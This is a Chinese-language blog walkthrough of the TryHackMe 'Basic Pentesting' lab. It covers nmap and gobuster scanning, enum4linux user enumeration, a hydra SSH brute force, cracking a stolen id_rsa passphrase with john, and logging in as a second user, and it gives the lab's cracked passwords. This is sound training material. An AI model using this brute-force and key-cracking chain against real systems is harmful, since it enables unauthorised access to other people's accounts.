【THM】Basic Pentesting-Practice
【THM】Basic Pentesting-Practice
hihopkc本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/basicpentestingjt
端口扫描
1 | nmap -p- -sC -sV -T4 10.10.186.104 |
1 | gobuster dir --url http://10.10.186.104 -w /usr/share/wordlists/dirb/common.txt |
获取目标机用户名
we use enum4linux to enumerate users
enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息
1 | enum4linux -a 10.10.186.104 |
1 | [+] Enumerating users using SID S-1-22-1 and logon username '', password '' |
方法二:
1 | #由之前的nmap扫描结果可知:目标机运行了Samba服务 |
爆破
1 | hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.186.104 |
密码为armando
1 | ssh jan@10.10.186.104 |
发现其他用户的hash密钥–id_rsa
将该密钥内容复制到攻击机上的id_rsa 中,先对id_rsa 进行加权操作,再尝试使用id_rsa通过ssh登录另一目标机用户,发现需要密码口令,在攻击机上使用john对id_rsa进行hash破解:
1 | chmod 600 id_rsa |
1 | #提取密钥hash值 |
beeswax
使用密码口令和idrsa.id_rsa 通过ssh登陆目标机的另一用户账号,并查看敏感文件信息
1 | ssh -i id_rsa kay@10.10.186.104 |
Q&A
1
在利用SSH登录某目标时,出现下述报错:
1 | ssh loneferret@192.168.140.146 |
1 | Unable to negotiate with 192.168.140.146 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss |
解决方案
之所以报错是因为OpenSSH 7.0以后的版本不再支持ssh-dss (DSA)算法,解决方法是增加选项-oHostKeyAlgorithms=+ssh-dss
,即可成功解决
2
一开始我给id_rsa文件777的权限
然后提示这个
主要是给的这个密钥权限太大了,所以它不怎么安全
解决方案
1 | chmod 600 id_rsa |
评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果